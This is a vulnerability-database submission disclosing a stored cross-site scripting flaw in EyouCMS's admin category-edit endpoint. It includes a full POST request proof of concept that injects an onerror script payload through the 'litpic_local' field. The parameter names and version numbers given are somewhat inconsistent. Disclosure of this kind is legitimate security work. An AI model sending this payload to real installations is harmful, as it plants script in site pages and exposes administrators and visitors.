| 제목 | eyoucms up to 1.6.2 'litpic_loca' stored xss vulnerability POC: |
|---|
| 설명 | eyoucms v1.5.4 typename parameter has a stored XSS vulnerability, attacker can update a new picture to a xss payload, and trigger the vulnerability when edit or view it again.
The vulnerable method + URI is:
POST /eyou/login.php?m=admin&c=Arctype&a=edit&lang=cn
and vulnerable parameter is 'litpic_loca'
POC below:
POST /eyou/login.php?m=admin&c=Arctype&a=edit&lang=cn HTTP/1.1
***********************************
typename=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&dirname=xinwendongtai¤t_channel=1&parent_id=0&channeltype=1&diy_dirpath=%2Fxinwendongtai&dirpath=&is_hidden=0&is_part=0&typelink=&englist_name=News+%26+Trends&litpic_local=%3Cimg+src%3D1+onerror%3Dalert%281%29%3E&litpic_remote=&old_arcrank=0&typearcrank=0&templist=lists_article.htm&tempview=view_article.htm&rulelist=%7B%E6%A0%8F%E7%9B%AE%E7%9B%AE%E5%BD%95%7D%2Flist_%7Btid%7D_%7Bpage%7D.html&ruleview=%7B%E6%A0%8F%E7%9B%AE%E7%9B%AE%E5%BD%95%7D%2F%7Baid%7D.html&seo_title=&seo_keywords=&seo_description=&tab=1&id=2&grade=0&oldgrade=0&old_current_channel=1
See details and poc at https://github.com/sleepyvv/vul_report/blob/main/EYOUCMS/XSS1.md |
|---|
| 원천 | ⚠️ https://www.eyoucms.com/ |
|---|
| 사용자 | WWesleywww (UID 43117) |
|---|
| 제출 | 2023. 04. 03. PM 02:38 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 04. 14. AM 10:34 (11 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 225942 [EyouCms 1.5.4 New Picture login.php?m=admin&c=Arctype&a=edit litpic_loca 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 17 |
|---|